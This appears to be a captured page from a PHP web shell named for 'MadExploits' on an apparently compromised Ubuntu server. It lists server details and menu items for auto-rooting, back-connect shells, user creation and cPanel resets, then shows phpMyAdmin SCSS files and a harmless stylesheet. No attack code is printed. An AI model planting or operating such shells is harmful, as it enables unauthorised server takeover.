Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
phpmyadmin /
themes /
pmahomme /
scss /
[ HOME SHELL ]
Name
Size
Permission
Action
_alert.scss
1.01
KB
-rw-r--r--
_breadcrumb.scss
315
B
-rw-r--r--
_buttons.scss
259
B
-rw-r--r--
_card.scss
2.34
KB
-rw-r--r--
_codemirror.scss
1.21
KB
-rw-r--r--
_common.scss
55.5
KB
-rw-r--r--
_designer.scss
8.23
KB
-rw-r--r--
_direction.scss
182
B
-rw-r--r--
_enum-editor.scss
919
B
-rw-r--r--
_forms.scss
73
B
-rw-r--r--
_gis.scss
425
B
-rw-r--r--
_icons.scss
11.33
KB
-rw-r--r--
_jqplot.scss
4.76
KB
-rw-r--r--
_list-group.scss
323
B
-rw-r--r--
_modal.scss
73
B
-rw-r--r--
_nav.scss
537
B
-rw-r--r--
_navbar.scss
530
B
-rw-r--r--
_navigation.scss
7.57
KB
-rw-r--r--
_reboot.scss
159
B
-rw-r--r--
_resizable-menu.scss
623
B
-rw-r--r--
_rte.scss
563
B
-rw-r--r--
_tables.scss
390
B
-rw-r--r--
_variables.scss
2.71
KB
-rw-r--r--
printview.scss
2.16
KB
-rw-r--r--
theme-rtl.scss
35
B
-rw-r--r--
theme.scss
484
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : printview.scss
@media print { #back_button_print_view, #print_button_print_view { display: none; } } // For removing element from Print View .print_ignore { display: none; } .nowrap { white-space: nowrap; } .hide { display: none; } // Standard CSS body, table, th, td { color: #000; background-color: #fff; font-size: 12px; } // To remove link text decoration a:link { color: #000; text-decoration: none; } // To remove any image borders img { border: 0; } // Table specific table, th, td { border: 0.1em solid #000; background-color: #fff; } table { border-collapse: collapse; border-spacing: 0.2em; } thead { border-collapse: collapse; border-spacing: 0.2em; border: 0.1em solid #000; font-weight: 900; } th, td { padding: 0.2em; } thead th { font-weight: bold; background-color: #e5e5e5; border: 0.1em solid #000; } th.vtop, td.vtop { vertical-align: top; } th.vbottom, td.vbottom { vertical-align: bottom; } // Common Elements not to be included // Hide Navigation and Top Menu bar // Hide console // Hide Navigation items (like Goto Top) // Hide the Create Table form // Hide the Page Settings Modal box // Hide footer, Demo notice, errors div // Hide the #selflink div #pma_navigation, #floating_menubar, #pma_console_container, #page_nav_icons, #create_table_form_minimal, #page_settings_modal, #pma_footer, #pma_demo, #pma_errors, #selflink { display: none; } // Position the main content #page_content { position: absolute; left: 0; top: 0; width: 95%; float: none; } // Specific Class for overriding while Print .print { background-color: #000; } .sqlOuter { color: black; background-color: #000; } // For hiding 'Open a New phpMyAdmin Window' button // Hide extra menu on /table/structure .ic_window-new, .ic_s_cog, #structure-action-links, #addColumns, .cDrop, .cEdit, .cList, .cCpy, .cPointer { display: none; } table tbody:first-of-type tr { // odd items 1,3,5,7... &:nth-child(odd) { background: #fff; th { background: #fff; } } // even items 2,4,6,8... &:nth-child(even) { background: #dfdfdf; th { background: #dfdfdf; } } } .column_attribute { font-size: 100%; }
Close